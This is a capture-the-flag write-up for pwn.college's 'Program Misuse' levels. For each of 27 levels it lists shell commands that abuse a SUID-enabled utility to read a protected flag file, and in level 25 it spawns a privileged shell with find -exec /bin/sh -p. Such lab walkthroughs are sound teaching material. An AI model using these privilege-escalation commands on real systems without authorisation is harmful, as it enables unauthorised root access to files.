Program Misuse
level 1
I just set the SUID bit on /usr/bin/cat.
Try to use it to read the flag!
We can just cat
the flag.
hacker@program-misuse~level1:/$ cat /flag
level 2
I just set the SUID bit on /usr/bin/more.
Try to use it to read the flag!
The more
utility is used to view the text files in the command prompt, displaying one screen at a time in case the file is large
hacker@program-misuse~level2:/$ more /flag
level 3
I just set the SUID bit on /usr/bin/less.
Try to use it to read the flag!
hacker@program-misuse~level3:/$ less /flag
level 4
I just set the SUID bit on /usr/bin/tail.
Try to use it to read the flag!
hacker@program-misuse~level4:/$ tail /flag
level 5
I just set the SUID bit on /usr/bin/head.
Try to use it to read the flag!
hacker@program-misuse~level5:/$ head /flag
level 6
I just set the SUID bit on /usr/bin/sort.
Try to use it to read the flag!
hacker@program-misuse~level6:/$ sort /flag
level 7
I just set the SUID bit on /usr/bin/vim.
Try to use it to read the flag!
hacker@program-misuse~level7:/$ vim /flag
level 8
I just set the SUID bit on /usr/bin/emacs.
Try to use it to read the flag!
hacker@program-misuse~level8:/$ emacs /flag
level 9
I just set the SUID bit on /usr/bin/nano.
Try to use it to read the flag!
hacker@program-misuse~level9:/$ nano /flag
level 10
I just set the SUID bit on /usr/bin/rev.
Try to use it to read the flag!
The rev
utility reverses the order of characters within a file.
hacker@program-misuse~level10:/$ rev /flag
The flag is reversed. In order to get the correct ordered flag, we have to pipe the above command with another rev
.
hacker@program-misuse~level10:/$ rev /flag | rev
level 11
I just set the SUID bit on /usr/bin/od.
Try to use it to read the flag!
The od
utility gives an octal dump of the data provided through STDIN.
If we provide the -c
option, od
will dump the ASCII representation.
hacker@program-misuse~level11:/$ od -c /flag
level 12
I just set the SUID bit on /usr/bin/hd.
Try to use it to read the flag!
The hd
utility gives an hexadecimal dump of the data provided through STDIN.
hacker@program-misuse~level12:/$ hd /flag
level 13
I just set the SUID bit on /usr/bin/xxd.
Try to use it to read the flag!
The xxd
creates a hex dump of the input provided through STDIN.
hacker@program-misuse~level13:/$ xxd /flag
level 14
I just set the SUID bit on /usr/bin/base32.
Try to use it to read the flag!
The base32
utility can be used to Base32 encode or decode data.
hacker@program-misuse~level14:/$ base32 /flag
THis prints the Base32 encoded flag string.
We can decode this string using the -d
option.
hacker@program-misuse~level14:/$ base32 /flag | base32 -d
level 15
I just set the SUID bit on /usr/bin/base64.
Try to use it to read the flag!
The base64
utility can be used to Base64 encode or decode data.
hacker@program-misuse~level15:/$ base64 /flag
This prints the Base64 flag string.
We can decode the string using the -d
option.
hacker@program-misuse~level15:/$ base64 /flag | base64 -d
level 16
I just set the SUID bit on /usr/bin/split.
Try to use it to read the flag!
The split
utility splits the given data based on the buffer size that is set.
The -x
option prints an unbuffered stream of data.
hacker@program-misuse~level16:~$ split -x /flag
This prints the flag into a file xaa
(could be different on your end).
hacker@program-misuse~level16:~$ cat xaa
level 17
I just set the SUID bit on /usr/bin/gzip.
Try to use it to read the flag!
The gzip
utility compresses the file provided to it using Lempel-Ziv coding.
hacker@program-misuse~level17:/$ gzip /flag
We can use the -d
option to decompress the flag.gz
file. Also, we can use the -c
option to print its content to STDOUT.
hacker@program-misuse~level17:/$ gzip -c -d /flag.gz
level 18
I just set the SUID bit on /usr/bin/bzip2.
Try to use it to read the flag!
The bzip2
utility compresses files using the Burrows-Wheeler block sorting text compression algorithm, and Huffman coding.
We can use the -c
option to print its content to STDOUT. Also, we can use the -d
option to decompress the flag.gz
file
hacker@program-misuse~level18:/$ bzip2 -c /flag | bzip2 -d
level 19
I just set the SUID bit on /usr/bin/zip.
Try to use it to read the flag!
The zip
is a compression and file packaging utility for Unix, VMS, MSDOS, OS/2, Windows 9x/NT/XP, Minix, Atari, Macintosh, Amiga, and Acorn RISC OS.
In order to use it, we have to specify a destination file as well.
hacker@program-misuse~level19:/$ zip /flag.zip /flag && cat /flag.zip
level 20
I just set the SUID bit on /usr/bin/tar.
Try to use it to read the flag!
The tar
utility is an archiving program designed to store multiple files in a single file (an archive), and to manipulate such archives.
hacker@program-misuse~level20:/$ tar -cvf flag.tar /flag && cat flag.tar
level 21
I just set the SUID bit on /usr/bin/ar.
Try to use it to read the flag!
ar
program creates, modifies, and extracts from archives.
We can specify the output file using the r
option.
hacker@program-misuse~level21:/$ ar r /flag.a /flag && cat /flag.a
level 22
I just set the SUID bit on /usr/bin/cpio.
Try to use it to read the flag!
The cpio
utility can be copy files between archives.
We can use the find
command for the /flag
, pipe it with cpio
and redirect the output to the flag.cpio
file.
hacker@program-misuse~level22:~$ find /flag | cpio -o > flag.cpio && cat flag.cpio
level 23
I just set the SUID bit on /usr/bin/genisoimage.
Try to use it to read the flag!
The genisoimage
utility creates filesystem images.
In order to retrieve the flag, we have to use the following script:
hacker@program-misuse~level23:/$ for option in $(genisoimage --help 2>&1 | grep FILE | awk {'print $1'}); do echo $option; genisoimage $option /flag 2>&1 | grep pwn; done
level 24
I just set the SUID bit on /usr/bin/env.
Try to use it to read the flag!
The env
utility sets the environment for another command.
We can pair it with cat
to read the flag.
hacker@program-misuse~level24:/$ env cat /flag
level 25
I just set the SUID bit on /usr/bin/find.
Try to use it to read the flag!
hacker@program-misuse~level25:~$ find . -exec /bin/sh -p \;
#
# cat /flag
cat: /flagcat: No such file or directory
pwn.college{UsQ6vfq4dFoZ1Q5jlesvmOxUwqA.01N2EDL4ITM0EzW}
level 26
I just set the SUID bit on /usr/bin/make.
Try to use it to read the flag!
The make
utility will determine automatically which pieces of a large program need to be recompiled, and issue the commands to recompile them.
Any command we specify within the Makefile
is executed.
all:
cat /flag
In order to execute the Makefile
, we have to run the make
command in the same directory as the file.
hacker@program-misuse~level26:~$ make
level 27
I just set the SUID bit on /usr/bin/nice.
Try to use it to read the flag!
The nice
utility ca be used to adjust the process scheduling.
hacker@program-misuse~level27:/$ nice cat /flag